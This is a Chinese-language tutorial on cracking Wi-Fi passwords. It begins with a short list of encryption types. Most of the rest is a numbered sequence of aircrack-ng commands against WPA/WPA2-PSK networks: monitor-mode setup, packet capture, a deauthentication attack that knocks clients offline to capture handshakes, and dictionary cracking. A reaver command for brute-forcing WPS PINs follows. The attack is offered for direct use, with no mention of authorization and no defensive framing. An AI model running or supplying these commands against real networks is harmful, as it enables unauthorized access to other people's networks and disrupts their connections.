wifi加密方式
1.不启用安全
2.WEP
3.WPA/WPA2-PSK(预共享密钥)
4.WPA/WPA2 802.1X (radius认证)
WEP加密方式的破解
wep加密方式99.99%可以破解(排除0.01%的人品问题),所以基本已经绝迹了,这里就不过多描述。如果真遇到此奇葩加密方式,可以参考这里 使用Aircrack-ng破解WEP加密类型的无线网络
WPA/WPA2-PSK加密方式的破解
使用Aircrack-ng工具,依次输入以下命令
防止设备繁忙
1.airmon-ng check kill
查看无线网卡状态
2.ifconfig/iwconfig/ifconfig -a
加载无线网卡,已加载则忽略
3.ifconfig wlan0 up
激活网卡
4.airmon-ng start wlan0
探测无线网络
5.airodump-ng mon0
如果出现“Device or resource busy”错误,请参考 出现设备繁忙的解决方法
airodump-ng常用参数:--wps、--essid、-c、-bssid
开始抓包
6.airodump-ng --ivs -w finame -c 6 mon0
ivs是通过ivs过滤,只保留可以破解密码的报文.ivs文件,这样比较快点;-w是将抓取的报文写入命名为abc并保存(之后会在当前文件夹保存为abc-01.ivs);-c后面跟频道,如这里的6
airodump-ng -c 1 --bssid XX:XX:XX:XX:XX -w finame mon0
deauth攻击,获取握手包
7.aireplay-ng -0 大小 -a 主机mac -c 客户端mac mon0
攻击时网卡必须和需要破解的wifi在同一频道。
deauth攻击为了获得握手包,会让链接的客户端断开。
如果出现“interfaceX is on channel Y, but the AP uses channel Z”,请输入:
sudo iwconfig wlan0 channel wifi的频道
跑字典破解
8.aircrack-ng -w password.lst finame-01.cap
本机测试时,大约为1.6k/s。也就是1分钟跑9.6万条密码。跑完字典大概40多分钟(字典比较小,共有3741905条密码)
利用路由器wps功能漏洞,跑pin码破解
输入命令
reaver -i mon0 -b MAC地址 -a -S -vv -d1 -t 3 -c 1
后续教程计划:
1.彩虹表破解
2.使用GPU加速破解
3.集群破解
推荐阅读
参考资料
1.WPA-PSK无线网络破解原理及过程
2.WIFI渗透从入门到精通
3.wpa wpa2类型的无线密码
4.出现设备繁忙的解决方法
5.利用wps漏洞穷举PIN码破解wifi密码
6.Kali Linux中前十名的Wifi攻击工具
7.Aireplay-ng的6种攻击模式详解
8.如何用GPU破解无线密码
9.使用GPU加速工具PYRIT极速破解无线密码
